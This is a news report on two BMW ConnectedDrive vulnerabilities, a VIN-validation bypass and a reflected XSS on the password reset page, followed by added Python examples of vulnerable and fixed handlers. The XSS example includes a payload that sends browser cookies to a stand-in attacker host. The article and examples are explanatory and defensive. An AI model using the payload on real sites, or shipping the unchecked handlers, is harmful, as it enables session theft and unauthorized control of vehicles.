2016-07-11

Benjamin Kunz Mejri, a researcher from Vulnerability Lab, has discovered two dangerous vulnerabilities in the ConnectedDrive portal owned by BMW. ConnectedDrive is the name of the car's infotainment system; it is used both in the cars themselves and on the various mobile devices that run the corresponding app. Mejri said the problems are still not fixed: BMW has been trying in vain to fix the bugs for five months.

The first problem is a session vulnerability that lets a user act on the VIN (Vehicle Identification Number) of another car. The VIN serves as the account ID in ConnectedDrive and is used to back up the car's settings in the user's account. Changing those settings on the web portal means they are also changed in the victim's car.

Mejri writes that the attack allowed him to bypass the VIN validation, use the VIN of another car, and then change its settings. ConnectedDrive can lock and unlock the car, gives access to the victim's email account, provides real-time traffic and route information, controls the climate control, lights and alarm system, can replace the list of music tracks, and so on.
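The flaw class described in the two paragraphs above, as an added illustration that is not BMW's code and not the researcher's proof of concept: a portal that keys per-vehicle settings by VIN and takes the VIN from the request as authoritative, beside a handler that first checks the VIN is registered to the authenticated account. The account names, VINs, settings and function names are all hypothetical.

```python
"""Added example: a VIN-keyed settings update that trusts the client-supplied
VIN (vulnerable) next to one that ties the VIN to the logged-in account (fixed).
Generic illustration only; not BMW ConnectedDrive code."""

from copy import deepcopy

# Constructed sample data: two accounts, each with one registered vehicle.
ACCOUNTS = {
    "alice": {"WBA0000000000001A"},   # hypothetical VINs
    "bob": {"WBA0000000000002B"},
}
INITIAL_SETTINGS = {
    "WBA0000000000001A": {"climate": "off", "doors": "locked"},
    "WBA0000000000002B": {"climate": "off", "doors": "locked"},
}


class Forbidden(Exception):
    """Raised when a request is refused by the authorization check."""


def update_settings_vulnerable(store, session_user, vin, changes):
    """Vulnerable handler: the session only proves *who* is logged in; the VIN in
    the request is never checked against that user's vehicles, so any logged-in
    user who knows another car's VIN can rewrite that car's stored settings."""
    if session_user not in ACCOUNTS:
        raise Forbidden("not logged in")
    store[vin].update(changes)          # missing: does vin belong to session_user?
    return store[vin]


def update_settings_fixed(store, session_user, vin, changes):
    """Hardened handler: the VIN must be one registered to the authenticated
    account. The client-supplied VIN is an input, not a proof of ownership."""
    if session_user not in ACCOUNTS:
        raise Forbidden("not logged in")
    if vin not in ACCOUNTS[session_user]:
        raise Forbidden("VIN not registered to this account")
    store[vin].update(changes)
    return store[vin]


def cross_account_attempt(handler):
    """Run the scenario from the article: bob, logged in with his own account,
    submits alice's VIN. Returns 'changed' if alice's doors were unlocked,
    'forbidden' if the handler refused. Each run works on a fresh copy of the
    settings so the two handlers can be compared independently."""
    store = deepcopy(INITIAL_SETTINGS)
    try:
        handler(store, "bob", "WBA0000000000001A", {"doors": "unlocked"})
    except Forbidden:
        return "forbidden"
    return "changed" if store["WBA0000000000001A"]["doors"] == "unlocked" else "unchanged"


if __name__ == "__main__":
    print("vulnerable:", cross_account_attempt(update_settings_vulnerable))
    print("fixed:     ", cross_account_attempt(update_settings_fixed))
```

A VIN is not a secret (it is stamped on the vehicle and printed in its registration papers), so it must never stand in for a credential: the server has to derive the set of vehicles a session may touch from the account record, not from what the request claims.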

The second problem is a common XSS (cross-site scripting) vulnerability that the researcher found on the ConnectedDrive password reset page. Exploiting the bug can be used to steal browser cookies, mount follow-on CSRF attacks, phishing attacks and so on, just as with any other XSS bug.
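What a reflected XSS on a password reset page amounts to, as an added example that is not the researcher's proof of concept and not BMW's code: a page that echoes a request parameter into HTML unescaped, beside the same page with the value escaped for its attribute context. The parameter name `email`, the attacker host and the form markup are hypothetical.

```python
"""Added example: reflected XSS in a password reset form (vulnerable rendering
next to the escaped version). Generic illustration; not the ConnectedDrive page."""

import html

# Constructed attacker input: closes the value attribute, then injects a script
# that ships the page's cookies to a hypothetical attacker host.
PAYLOAD = (
    '"><script>new Image().src='
    '"https://attacker.example/?c="+encodeURIComponent(document.cookie)</script>'
)


def render_reset_vulnerable(email: str) -> str:
    """Reflects the parameter verbatim: the attacker's markup becomes part of
    the page and the browser executes it in the site's origin."""
    return (
        '<form method="post" action="/reset">'
        f'<input name="email" value="{email}">'
        '<button>Reset password</button></form>'
    )


def render_reset_fixed(email: str) -> str:
    """Escapes <, >, &, " and ' before reflection, so the attacker's input stays
    inside the attribute as inert text."""
    safe = html.escape(email, quote=True)
    return (
        '<form method="post" action="/reset">'
        f'<input name="email" value="{safe}">'
        '<button>Reset password</button></form>'
    )


def injects_script(page: str) -> bool:
    """Crude check used for the demonstration: does a raw <script> tag appear?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    print("vulnerable page executes payload:", injects_script(render_reset_vulnerable(PAYLOAD)))
    print("fixed page executes payload:     ", injects_script(render_reset_fixed(PAYLOAD)))
```

Escaping at output is the fix for the bug itself; marking the session cookie `HttpOnly` limits the cookie-theft outcome described above but does nothing against the phishing or CSRF uses of the same injection point, so it is defence in depth, not a substitute.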

The researcher notified BMW about the vulnerabilities in February 2016. Since BMW has taken no measures to resolve the issues, Mejri waited out the allotted time and disclosed information about the bugs. Detailed information and proof-of-concept exploits can be found on the official Vulnerability Lab website: the report on the first issue and the report on the second.
